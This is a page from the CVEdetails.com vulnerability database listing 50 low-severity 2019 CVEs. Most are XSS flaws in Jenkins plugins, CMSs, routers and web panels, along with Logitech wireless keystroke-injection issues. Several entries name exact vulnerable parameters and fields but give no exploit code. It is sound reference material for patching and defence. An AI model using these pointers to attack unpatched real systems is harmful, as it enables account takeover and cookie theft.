CVEdetails.com the ultimate security vulnerability data source
(e.g.: CVE-2009-1234 or 2010-1234 or 20101234)
Log In   Register
Vulnerability Feeds & WidgetsNew   www.itsecdb.com  

Security Vulnerabilities (CVSS score between 3 and 3.99)

Press ESC to close
# CVE ID CWE ID # of Exploits Vulnerability Type(s) Publish Date Update Date Score Gained Access Level Access Complexity Authentication Conf. Integ. Avail.
1 CVE-2019-1010003 79 XSS 2019-07-11 2019-07-12
3.5
None Remote Medium Single system None Partial None
Leanote prior to version 2.6 is affected by: Cross Site Scripting (XSS).
2 CVE-2019-1003050 79 XSS 2019-04-10 2019-04-12
3.5
None Remote Medium Single system None Partial None
The f:validateButton form control for the Jenkins UI did not properly escape job URLs in Jenkins 2.171 and earlier and Jenkins LTS 2.164.1 and earlier, resulting in a cross-site scripting (XSS) vulnerability exploitable by users with the ability to control job names.
3 CVE-2019-1003043 255 2019-03-28 2019-04-02
3.5
None Remote Medium Single system Partial None None
A missing permission check in Jenkins Slack Notification Plugin 2.19 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
4 CVE-2019-1003042 79 XSS 2019-03-28 2019-06-10
3.5
None Remote Medium Single system None Partial None
A cross site scripting vulnerability in Jenkins Lockable Resources Plugin 2.4 and earlier allows attackers able to control resource names to inject arbitrary JavaScript in web pages rendered by the plugin.
5 CVE-2019-1003014 79 XSS 2019-02-06 2019-04-26
3.5
None Remote Medium Single system None Partial None
An cross-site scripting vulnerability exists in Jenkins Config File Provider Plugin 3.4.1 and earlier in src/main/resources/lib/configfiles/configfiles.jelly that allows attackers with permission to define shared configuration files to execute arbitrary JavaScript when a user attempts to delete the shared configuration file.
6 CVE-2019-1003013 79 XSS 2019-02-06 2019-04-26
3.5
None Remote Medium Single system None Partial None
An cross-site scripting vulnerability exists in Jenkins Blue Ocean Plugins 1.10.1 and earlier in blueocean-commons/src/main/java/io/jenkins/blueocean/commons/stapler/Export.java, blueocean-commons/src/main/java/io/jenkins/blueocean/commons/stapler/export/ExportConfig.java, blueocean-commons/src/main/java/io/jenkins/blueocean/commons/stapler/export/JSONDataWriter.java, blueocean-rest-impl/src/main/java/io/jenkins/blueocean/service/embedded/UserStatePreloader.java, blueocean-web/src/main/resources/io/jenkins/blueocean/PageStatePreloadDecorator/header.jelly that allows attackers with permission to edit a user's description in Jenkins to have Blue Ocean render arbitrary HTML when using it as that user.
7 CVE-2019-13341 79 XSS 2019-07-05 2019-07-07
3.5
None Remote Medium Single system None Partial None
In MiniCMS V1.10, stored XSS was found in mc-admin/conf.php (comment box), which can be used to get a user's cookie.
8 CVE-2019-13340 79 XSS 2019-07-05 2019-07-07
3.5
None Remote Medium Single system None Partial None
In MiniCMS V1.10, stored XSS was found in mc-admin/post-edit.php via the content box. An attacker can use it to get a user's cookie. This is different from CVE-2018-10296, CVE-2018-16233, CVE-2018-20520, and CVE-2019-13186.
9 CVE-2019-13339 79 XSS 2019-07-05 2019-07-07
3.5
None Remote Medium Single system None Partial None
In MiniCMS V1.10, stored XSS was found in mc-admin/page-edit.php (content box), which can be used to get a user's cookie.
10 CVE-2019-13070 79 Exec Code XSS 2019-07-09 2019-07-10
3.5
None Remote Medium Single system None Partial None
A stored XSS vulnerability in the Agent/Center component of CyberPower PowerPanel Business Edition 3.4.0 allows a privileged attacker to embed malicious JavaScript in the SNMP trap receivers form. Upon visiting the /agent/action_recipient Event Action/Recipient page, the embedded code will be executed in the browser of the victim.
11 CVE-2019-13055 200 +Info 2019-06-29 2019-07-08
3.3
None Local Network Low Not required Partial None None
Certain Logitech Unifying devices allow attackers to dump AES keys and addresses, leading to the capability of live decryption of Radio Frequency transmissions, as demonstrated by an attack against a Logitech K360 keyboard.
12 CVE-2019-13054 74 Bypass 2019-06-29 2019-07-08
3.3
None Local Network Low Not required None Partial None
The Logitech R500 presentation clicker allows attackers to determine the AES key, leading to keystroke injection. On Windows, any text may be injected by using ALT+NUMPAD input to bypass the restriction on the characters A through Z.
13 CVE-2019-13053 74 Bypass 2019-06-29 2019-07-08
3.3
None Local Network Low Not required None Partial None
Logitech Unifying devices allow keystroke injection, bypassing encryption. The attacker must press a "magic" key combination while sniffing cryptographic data from a Radio Frequency transmission. NOTE: this issue exists because of an incomplete fix for CVE-2016-10761.
14 CVE-2019-13052 200 +Info 2019-06-29 2019-07-08
3.3
None Local Network Low Not required Partial None None
Logitech Unifying devices allow live decryption if the pairing of a keyboard to a receiver is sniffed.
15 CVE-2019-12830 79 XSS 2019-06-15 2019-06-20
3.5
None Remote Medium Single system None Partial None
In MyBB before 1.8.21, an attacker can exploit a parsing flaw in the Private Message / Post renderer that leads to [video] BBCode persistent XSS to take over any forum account, aka a nested video MyCode issue.
16 CVE-2019-12749 287 Bypass 2019-06-11 2019-06-14
3.6
None Local Low Not required Partial Partial None
dbus before 1.10.28, 1.12.x before 1.12.16, and 1.13.x before 1.13.12, as used in DBusServer in Canonical Upstart in Ubuntu 14.04 (and in some, less common, uses of dbus-daemon), allows cookie spoofing because of symlink mishandling in the reference implementation of DBUS_COOKIE_SHA1 in the libdbus library. (This only affects the DBUS_COOKIE_SHA1 authentication mechanism.) A malicious client with write access to its own home directory could manipulate a ~/.dbus-keyrings symlink to cause a DBusServer with a different uid to read and write in unintended locations. In the worst case, this could result in the DBusServer reusing a cookie that is known to the malicious client, and treating that cookie as evidence that a subsequent client connection came from an attacker-chosen uid, allowing authentication bypass.
17 CVE-2019-12745 79 XSS 2019-06-20 2019-06-24
3.5
None Remote Medium Single system None Partial None
out/out.UsrMgr.php in SeedDMS before 5.1.11 allows Stored Cross-Site Scripting (XSS) via the name field.
18 CVE-2019-12566 79 XSS 2019-06-02 2019-06-03
3.5
None Remote Medium Single system None Partial None
The WP Statistics plugin through 12.6.5 for Wordpress has stored XSS in includes/class-wp-statistics-pages.php. This is related to an account with the Editor role creating a post with a title that contains JavaScript, to attack an admin user.
19 CVE-2019-12500 285 2019-05-31 2019-05-31
3.3
None Local Network Low Not required None Partial None
The Xiaomi M365 scooter 2019-02-12 before 1.5.1 allows spoofing of "suddenly accelerate" commands. This occurs because Bluetooth Low Energy commands have no server-side authentication check. Other affected commands include suddenly braking, locking, and unlocking.
20 CVE-2019-12452 255 2019-05-29 2019-05-30
3.5
None Remote Medium Single system Partial None None
types/types.go in Containous Traefik 1.7.x through 1.7.11, when the --api flag is used and the API is publicly reachable and exposed without sufficient access control (which is contrary to the API documentation), allows remote authenticated users to discover password hashes by reading the Basic HTTP Authentication or Digest HTTP Authentication section, or discover a key by reading the ClientTLS section. These can be found in the JSON response to a /api request.
21 CVE-2019-12376 798 2019-06-03 2019-06-04
3.5
None Remote Medium Single system Partial None None
Use of a hard-coded encryption key in Ivanti LANDESK Management Suite (LDMS, aka Endpoint Manager) 10.0.1.168 Service Update 5 may lead to full managed endpoint compromise by an authenticated user with read privileges.
22 CVE-2019-12195 79 XSS 2019-05-24 2019-05-29
3.5
None Remote Medium Single system None Partial None
TP-Link TL-WR840N v5 00000005 devices allow XSS via the network name. The attacker must log into the router by breaking the password and going to the admin login page by THC-HYDRA to get the network name. With an XSS payload, the network name changed automatically and the internet connection was disconnected. All the users become disconnected from the internet.
23 CVE-2019-12190 79 XSS 2019-05-21 2019-05-21
3.5
None Remote Medium Single system None Partial None
XSS was discovered in CentOS-WebPanel.com (aka CWP) CentOS Web Panel through 0.9.8.747 via the testacc/fileManager2.php fm_current_dir or filename parameter.
24 CVE-2019-12184 79 XSS 2019-05-19 2019-05-20
3.5
None Remote Medium Single system None Partial None
There is XSS in browser/components/MarkdownPreview.js in BoostIO Boostnote 0.11.15 via a label named flowchart, sequence, gallery, or chart, as demonstrated by a crafted SRC attribute of an IFRAME element, a different vulnerability than CVE-2019-12136.
25 CVE-2019-12136 79 XSS 2019-05-15 2019-05-16
3.5
None Remote Medium Single system None Partial None
There is XSS in BoostIO Boostnote 0.11.15 via a label named mermaid, as demonstrated by a crafted SRC attribute of an IFRAME element.
26 CVE-2019-11878 190 Overflow 2019-05-10 2019-05-13
3.3
None Local Network Low Not required None None Partial
An issue was discovered on XiongMai Besder IP20H1 V4.02.R12.00035520.12012.047500.00200 cameras. An attacker on the same local network as the camera can craft a message with a size field larger than 0x80000000 and send it to the camera, related to an integer overflow or use of a negative number. This then crashes the camera for about 120 seconds.
27 CVE-2019-11871 79 XSS 2019-05-09 2019-06-17
3.5
None Remote Medium Single system None Partial None
The Custom Field Suite plugin before 2.5.15 for WordPress has XSS for editors or admins.
28 CVE-2019-11828 79 XSS 2019-06-30 2019-07-01
3.5
None Remote Medium Single system None Partial None
Cross-site scripting (XSS) vulnerability in Chart in Synology Office before 3.1.4-2771 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
29 CVE-2019-11827 79 XSS 2019-06-30 2019-07-01
3.5
None Remote Medium Single system None Partial None
Cross-site scripting (XSS) vulnerability in SYNO.NoteStation.Shard in Synology Note Station before 2.5.3-0863 allows remote attackers to inject arbitrary web script or HTML via the object_id parameter.
30 CVE-2019-11825 79 XSS 2019-06-30 2019-07-01
3.5
None Remote Medium Single system None Partial None
Cross-site scripting (XSS) vulnerability in Event Editor in Synology Calendar before 2.3.0-0615 allows remote attackers to inject arbitrary web script or HTML via the title parameter.
31 CVE-2019-11649 79 Exec Code XSS 2019-06-19 2019-06-24
3.5
None Remote Medium Single system None Partial None
Cross-Site Scripting vulnerability in Micro Focus Fortify Software Security Center Server, versions 17.2, 18.1, 18.2, has been identified in Micro Focus Software Security Center. The vulnerability could be exploited to execute JavaScript code in user?s browser. The vulnerability could be exploited to execute JavaScript code in user?s browser.
32 CVE-2019-11513 79 XSS 2019-04-24 2019-04-26
3.5
None Remote Medium Single system None Partial None
The File Manager in CMS Made Simple through 2.2.10 has Reflected XSS via the "New name" field in a Rename action.
33 CVE-2019-11504 79 XSS 2019-04-24 2019-05-06
3.5
None Remote Medium Single system None Partial None
Zotonic before version 0.47 has mod_admin XSS.
34 CVE-2019-11429 79 XSS 2019-05-13 2019-05-15
3.5
None Remote Medium Single system None Partial None
CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.793 (Free/Open Source Version), 0.9.8.753 (Pro) and 0.9.8.807 (Pro) is vulnerable to Reflected XSS for the "Domain" field on the "DNS Functions > "Add DNS Zone" screen.
35 CVE-2019-11370 79 XSS 2019-06-03 2019-06-04
3.5
None Remote Medium Single system None Partial None
Stored XSS was discovered in Carel pCOWeb prior to B1.2.4, as demonstrated by the config/pw_snmp.html "System contact" field.
36 CVE-2019-11368 79 XSS 2019-06-03 2019-06-05
3.5
None Remote Medium Single system None Partial None
Stored XSS was discovered in AUO Solar Data Recorder before 1.3.0 via the protect/config.htm addr parameter.
37 CVE-2019-11226 79 XSS 2019-06-05 2019-06-05
3.5
None Remote Medium Single system None Partial None
CMS Made Simple 2.2.10 has XSS via the m1_name parameter in "Add Article" under Content -> Content Manager -> News.
38 CVE-2019-11092 254 2019-06-13 2019-06-14
3.6
None Local Low Not required Partial Partial None
Insufficient password protection in the attestation database for Open CIT may allow an authenticated user to potentially enable information disclosure via local access.
39 CVE-2019-11025 79 XSS 2019-04-08 2019-04-16
3.5
None Remote Medium Single system None Partial None
In clearFilter() in utilities.php in Cacti before 1.2.3, no escaping occurs before printing out the value of the SNMP community string (SNMP Options) in the View poller cache, leading to XSS.
40 CVE-2019-11017 79 XSS 2019-04-18 2019-04-19
3.5
None Remote Medium Single system None Partial None
On D-Link DI-524 V2.06RU devices, multiple Stored and Reflected XSS vulnerabilities were found in the Web Configuration: /spap.htm, /smap.htm, and /cgi-bin/smap, as demonstrated by the cgi-bin/smap RC parameter.
41 CVE-2019-10975 125 2019-07-02 2019-07-05
3.3
None Local Medium Not required Partial None Partial
An out-of-bounds read vulnerability has been identified in Fuji Electric Alpha7 PC Loader Versions 1.1 and prior, which may crash the system.
42 CVE-2019-10909 79 XSS 2019-05-16 2019-05-20
3.5
None Remote Medium Single system None Partial None
In Symfony before 2.7.51, 2.8.x before 2.8.50, 3.x before 3.4.26, 4.x before 4.1.12, and 4.2.x before 4.2.7, validation messages are not escaped, which can lead to XSS when user input is included. This is related to symfony/framework-bundle.
43 CVE-2019-10893 79 XSS 2019-04-18 2019-05-02
3.5
None Remote Medium Single system None Partial None
CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.793 (Free/Open Source Version) and 0.9.8.753 (Pro) is vulnerable to Stored/Persistent XSS for Admin Email fields on the "CWP Settings > "Edit Settings" screen. By changing the email ID to any XSS Payload and clicking on Save Changes, the XSS Payload will execute.
44 CVE-2019-10689 287 +Info 2019-06-24 2019-06-27
3.3
None Local Network Low Not required Partial None None
VVX products using UCS software version 5.9.2 and earlier with Better Together over Ethernet Connector (BToE) application version 3.9.1 and earlier provides insufficient authentication between the BToE application and the BToE component, resulting in leakage of sensitive information.
45 CVE-2019-10634 79 XSS 2019-04-09 2019-04-09
3.5
None Remote Medium Single system None Partial None
An XSS vulnerability in the Zyxel NAS 326 version 5.21 and below allows a remote authenticated attacker to inject arbitrary JavaScript or HTML via the user, group, and file-share description fields.
46 CVE-2019-10349 79 XSS 2019-07-11 2019-07-15
3.5
None Remote Medium Single system None Partial None
A stored cross site scripting vulnerability in Jenkins Dependency Graph Viewer Plugin 0.13 and earlier allowed attackers able to configure jobs in Jenkins to inject arbitrary HTML and JavaScript in the plugin-provided web pages in Jenkins.
47 CVE-2019-10335 79 XSS 2019-06-11 2019-06-13
3.5
None Remote Medium Single system None Partial None
A stored cross site scripting vulnerability in Jenkins ElectricFlow Plugin 1.1.5 and earlier allowed attackers able to configure jobs in Jenkins or control the output of the ElectricFlow API to inject arbitrary HTML and JavaScript in the plugin-provided output on build status pages.
48 CVE-2019-10325 79 XSS 2019-05-31 2019-06-03
3.5
None Remote Medium Single system None Partial None
A cross-site scripting vulnerability in Jenkins Warnings NG Plugin 5.0.0 and earlier allowed attacker with Job/Configure permission to inject arbitrary JavaScript in build overview pages.
49 CVE-2019-10300 352 CSRF 2019-04-18 2019-05-06
3.5
None Remote Medium Single system Partial None None
A cross-site request forgery vulnerability in Jenkins GitLab Plugin 1.5.11 and earlier in the GitLabConnectionConfig#doTestConnection form validation method allowed attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
50 CVE-2019-10261 79 XSS 2019-04-03 2019-05-06
3.5
None Remote Medium Single system None Partial None
CentOS Web Panel (CWP) 0.9.8.789 is vulnerable to Stored/Persistent XSS for the "Name Server 1" and "Name Server 2" fields via a "DNS Functions" "Edit Nameservers IPs" action.
Total number of vulnerabilities : 4150   Page : 1 (This Page)2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83
CVE is a registred trademark of the MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. CWE is a registred trademark of the MITRE Corporation and the authoritative source of CWE content is MITRE's CWE web site. OVAL is a registered trademark of The MITRE Corporation and the authoritative source of OVAL content is MITRE's OVAL web site.
Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.